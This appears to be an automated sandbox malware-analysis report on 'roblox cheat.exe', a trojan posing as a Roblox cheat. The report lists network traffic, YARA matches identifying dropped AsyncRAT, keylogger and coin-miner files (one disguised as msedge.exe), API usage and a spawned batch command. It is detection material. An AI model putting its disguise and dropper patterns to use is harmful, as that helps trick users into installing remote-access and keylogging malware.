            Source: robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447206724.0000000003F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49743 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: BitCoin_miner.exe.3.dr, XLogger.cs.Net Code: KeyboardLayout
            Source: msedge.exe.3.dr, XLogger.cs.Net Code: KeyboardLayout

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16BC2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16BC2F0
            Source: C:\Users\user\Desktop\roblox cheat.exeCode function: 0_2_014E164C0_2_014E164C
            Source: C:\Users\user\Desktop\roblox cheat.exeCode function: 0_2_014E31CA0_2_014E31CA
            Source: C:\Users\user\Desktop\roblox cheat.exeCode function: 0_2_014E34C10_2_014E34C1
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16DB1903_2_00007FF6C16DB190
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16CA4AC3_2_00007FF6C16CA4AC
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16D34843_2_00007FF6C16D3484
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16BF9303_2_00007FF6C16BF930
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16C49283_2_00007FF6C16C4928
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16E07543_2_00007FF6C16E0754
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16DCE883_2_00007FF6C16DCE88
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16D1F203_2_00007FF6C16D1F20
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16B5E243_2_00007FF6C16B5E24
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16B72883_2_00007FF6C16B7288
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16C126C3_2_00007FF6C16C126C
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16BA3103_2_00007FF6C16BA310
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16BC2F03_2_00007FF6C16BC2F0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16CF1803_2_00007FF6C16CF180
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16D21D03_2_00007FF6C16D21D0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16CB5343_2_00007FF6C16CB534
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16D53F03_2_00007FF6C16D53F0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16B76C03_2_00007FF6C16B76C0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16F25503_2_00007FF6C16F2550
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16B48403_2_00007FF6C16B4840
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16EC8383_2_00007FF6C16EC838
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16D2AB03_2_00007FF6C16D2AB0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16B1AA43_2_00007FF6C16B1AA4
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16EFA943_2_00007FF6C16EFA94
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16C1A483_2_00007FF6C16C1A48
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16F5AF83_2_00007FF6C16F5AF8
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16E89A03_2_00007FF6C16E89A0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16CC96C3_2_00007FF6C16CC96C
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16D39643_2_00007FF6C16D3964
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16D4B983_2_00007FF6C16D4B98
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16CBB903_2_00007FF6C16CBB90
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16C5B603_2_00007FF6C16C5B60
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16E8C1C3_2_00007FF6C16E8C1C
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16CAF183_2_00007FF6C16CAF18
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16D2D583_2_00007FF6C16D2D58
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16E07543_2_00007FF6C16E0754
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16D8DF43_2_00007FF6C16D8DF4
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16F20803_2_00007FF6C16F2080
            Source: roblox cheat.exe, 00000000.00000000.1243509232.0000000000C80000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000000.1244210855.0000000000DB4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepayload.exe4 vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000002.1253258267.000000000139E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000002.1255092707.00000000046E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exeBinary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exeBinary or memory string: OriginalFilenamepayload.exe4 vs roblox cheat.exe
            Source: roblox cheat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: BitCoin_miner.exe.3.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, tMXwX3tWlMuOZgJ.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, dtVFTVK0Ux3SN1R.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, dtVFTVK0Ux3SN1R.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal90.troj.spyw.evad.winEXE@26/17@22/12
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16BB6D8 GetLastError,FormatMessageW,LocalFree,3_2_00007FF6C16BB6D8
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16D8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00007FF6C16D8624
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeFile created: C:\Program Files (x86)\RobloxJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\roblox cheat.exe.logJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
            Source: C:\Users\user\Desktop\roblox cheat.exeFile created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" "
            Source: roblox cheat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: roblox cheat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
            Source: C:\Users\user\Desktop\roblox cheat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: roblox cheat.exeReversingLabs: Detection: 60%
            Source: roblox cheat.exeString found in binary or memory: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\Installer\Windows\include\Installer/Installer.h
            Source: roblox cheat.exeString found in binary or memory: tcontentcontent\avatarcontent\configscontent\fontscontent\skycontent\soundscontent\texturescontent\modelsExtraContentExtraContent\LuaPackagesExtraContent\translationsExtraContent\modelsExtraContent\texturesExtraContent\placesPlatformContentPlatformContent\pcPlatformContent\pc\texturesPlatformContent\pc\terrainPlatformContent\pc\fontsshaderssslWebView2RuntimeInstallerInstallerFailedToLaunchClientInstallerFailedToLaunchItself[FLog::DesktopInstaller] Downloading file {}Failed to download {}Empty response from {}Failed to compare {} to expected hash {} of {}. responseBody size: {}. http code: {}.failed Error from WinInet: {}Failed to overwrite {}[FLog::DesktopInstaller] unzipping file {}[FLog::DesktopInstaller] copying file {}failed to copy file {} to {}C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\Installer\Windows\src\Installer.cppAppPathAppName[FLog::DesktopInstaller] failed to read subkey {}[FLog::DesktopInstaller] found obsolete elevation policy registry of {} in folder {}Uncaught exception occurred. Code: {}[FLog::DesktopInstaller] Uncaught exception occurred[FLog::DesktopInstaller] Failed to recordStatus at milestone {} with error: {}successrecordStatus_{}isBackgroundModeInstallerRestartedFailed with exception {}Caught Windows error: {}Got null installer while initializing{}\Temp\Roblox\{}_{}Failed to create folder {}Failed to copy file from {} to {}failstartNewStatusFile[FLog::DesktopInstaller] Failed to start new status file with error: {}. Removing background mode arg{} {} {}[FLog::DesktopInstaller] Ready to relaunch: {}*"{}\{}\{}"Download startedDownload completed[FLog::DesktopInstaller] Download and install files{}-{}ErrorFile{}Error in running fileTasks{}\AppSettings.xmlfailed to write file: {}{}\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe[FLog::DesktopInstaller] Run webview2 installer {}[FLog::DesktopInstaller] Failed to run webview2 installer {} in user mode: waitResult={}, errCode={}, exitCode={}[FLog::DesktopInstaller] Rerun webview2 installer {} in admin mode[FLog::DesktopInstaller] Failed to run webview2 installer {} in admin mode: waitResult={}, errCode={}, exitCode={}[FLog::DesktopInstaller] No privilege to rerun webview2 installer {} in admin mode[FLog::DesktopInstaller] Create installation folders[FLog::DesktopInstaller] Create installation folder: {}[FLog::DesktopInstaller] Installation Item: {} to {}[FLog::DesktopInstaller] Register environment info{}\{}.exe"{}" -uninstallUninstallStringRoblox CorporationPublisherhttp://{}URLInfoAboutCommentsInstallLocationNoModifyNoRepair{},0DisplayIconDisplayName{:04d}-{:02d}-{:02d}InstallDate{}\CapabilitiesApplicationDescription"{}",0ApplicationIconApplicationName{}\UrlAssociationsbaseHostversionfailed to remove uninstall registryfailed to remove IE subEnviron registryfailed to remove class registryversion-*[FLog::DesktopInstaller] Remove installation target: {}[FLog::DesktopInstaller] Failed to remove old files in {}, you may need delete the folder manually.\Roblox{}\
            Source: roblox cheat.exeString found in binary or memory: Miscellaneous-Installation-of-desktop-items
            Source: roblox cheat.exeString found in binary or memory: Miscellaneous-Launching-programs-and-files-in-an-IFRAME
            Source: roblox cheat.exeString found in binary or memory: Miscellaneous-Launching-applications-and-unsafe-files
            Source: roblox cheat.exeString found in binary or memory: Miscellaneous-Allow-websites-to-open-windows-without-address-or-status-bars
            Source: roblox cheat.exeString found in binary or memory: Automatically logon with current username and passwordPrompt for user name and passwordAutomatic logon only in the Intranet zoneAnonymous logonDisableHigh SafetyEnablePromptAdministrator approvedNotReachableWifiWiredActiveX-controls-and-plug-ins-Download-signed-ActiveX-controls1001ActiveX-controls-and-plug-ins-Download-unsigned-ActiveX-controls1004ActiveX-controls-and-plug-ins-Run-ActiveX-controls-and-plug-ins1200ActiveX-controls-and-plug-ins-Initialize-and-script-ActiveX-controls-not-marked-as-safe-for-scripting1201Miscellaneous-Allow-scripting-of-Internet-Explorer-Web-browser-control1206ActiveX-controls-and-plug-ins-Allow-previously-unused-ActiveX-controls-to-run-without-prompt1208ActiveX-controls-and-plug-ins-Allow-Scriptlets1209ActiveX-controls-and-plug-ins-ActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrictions120AActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrict-ions120BScripting-Active-scripting1400Scripting-Scripting-of-Java-applets1402ActiveX-controls-and-plug-ins-Script-ActiveX-controls-marked-as-safe-for-scripting1405Miscellaneous-Access-data-sources-across-domains1406Scripting-Allow-Programmatic-clipboard-access1407Scripting-Enable-XSS-Filter1409Miscellaneous-Submit-non-encrypted-form-data1601Downloads-Font-download1604Run-Java1605Miscellaneous-Userdata-persistence1606Miscellaneous-Navigate-sub-frames-across-different-domains1607Miscellaneous-Allow-META-REFRESH1608Miscellaneous-Display-mixed-content1609Miscellaneous-Include-local-directory-path-when-uploading-files-to-a-server160AMiscellaneous-Installation-of-desktop-items1800Miscellaneous-Drag-and-drop-or-copy-and-paste-files1802Downloads-File-Download1803Miscellaneous-Launching-programs-and-files-in-an-IFRAME1804Launching-programs-and-files-in-webview1805Miscellaneous-Launching-applications-and-unsafe-files1806Miscellaneous-Use-Pop-up-Blocker1809Allow-OpenSearch-queries-in-Windows-Explorer180EAllow-previewing-and-custom-thumbnails-of-OpenSearch-query-results-in-Windows-Explorer180FUser-Authentication-Logon1A00Allow-persistent-cookies-that-are-stored-on-your-computer1A02Allow-per-session-cookies-not-stored1A03Miscellaneous-Dont-prompt-for-client-certificate-selection-when-no-certificates-or-only-one-certificate-exists1A04Allow-3rd-party-persistent-cookies1A05Allow-3rd-party-session-cookies1A06Miscellaneous-Software-channel-permissions1E05ActiveX-controls-and-plug-ins-Binary-and-script-behaviors2000DotNET-Framework-reliant-components-Run-components-signed-with-Authenticode2001DotNET-Framework-reliant-components-Run-components-not-signed-with-Authenticode2004DotNET-Framework-Reliant-Components-Permissions-for-Components-with-Manifests2007Miscellaneous-Open-files-based-on-content-not-file-extension2100Miscellaneous-Web-sites-in-less-privileged-web-content-zone-can-navigate-into-this-zone2101Miscellaneous-Allow-script-initiated-windows-without-size-or-position-constraints2102Scripting-Allow-status-bar-updates-via-script2103Miscellaneo
            Source: roblox cheat.exeString found in binary or memory: Automatically logon with current username and passwordPrompt for user name and passwordAutomatic logon only in the Intranet zoneAnonymous logonDisableHigh SafetyEnablePromptAdministrator approvedNotReachableWifiWiredActiveX-controls-and-plug-ins-Download-signed-ActiveX-controls1001ActiveX-controls-and-plug-ins-Download-unsigned-ActiveX-controls1004ActiveX-controls-and-plug-ins-Run-ActiveX-controls-and-plug-ins1200ActiveX-controls-and-plug-ins-Initialize-and-script-ActiveX-controls-not-marked-as-safe-for-scripting1201Miscellaneous-Allow-scripting-of-Internet-Explorer-Web-browser-control1206ActiveX-controls-and-plug-ins-Allow-previously-unused-ActiveX-controls-to-run-without-prompt1208ActiveX-controls-and-plug-ins-Allow-Scriptlets1209ActiveX-controls-and-plug-ins-ActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrictions120AActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrict-ions120BScripting-Active-scripting1400Scripting-Scripting-of-Java-applets1402ActiveX-controls-and-plug-ins-Script-ActiveX-controls-marked-as-safe-for-scripting1405Miscellaneous-Access-data-sources-across-domains1406Scripting-Allow-Programmatic-clipboard-access1407Scripting-Enable-XSS-Filter1409Miscellaneous-Submit-non-encrypted-form-data1601Downloads-Font-download1604Run-Java1605Miscellaneous-Userdata-persistence1606Miscellaneous-Navigate-sub-frames-across-different-domains1607Miscellaneous-Allow-META-REFRESH1608Miscellaneous-Display-mixed-content1609Miscellaneous-Include-local-directory-path-when-uploading-files-to-a-server160AMiscellaneous-Installation-of-desktop-items1800Miscellaneous-Drag-and-drop-or-copy-and-paste-files1802Downloads-File-Download1803Miscellaneous-Launching-programs-and-files-in-an-IFRAME1804Launching-programs-and-files-in-webview1805Miscellaneous-Launching-applications-and-unsafe-files1806Miscellaneous-Use-Pop-up-Blocker1809Allow-OpenSearch-queries-in-Windows-Explorer180EAllow-previewing-and-custom-thumbnails-of-OpenSearch-query-results-in-Windows-Explorer180FUser-Authentication-Logon1A00Allow-persistent-cookies-that-are-stored-on-your-computer1A02Allow-per-session-cookies-not-stored1A03Miscellaneous-Dont-prompt-for-client-certificate-selection-when-no-certificates-or-only-one-certificate-exists1A04Allow-3rd-party-persistent-cookies1A05Allow-3rd-party-session-cookies1A06Miscellaneous-Software-channel-permissions1E05ActiveX-controls-and-plug-ins-Binary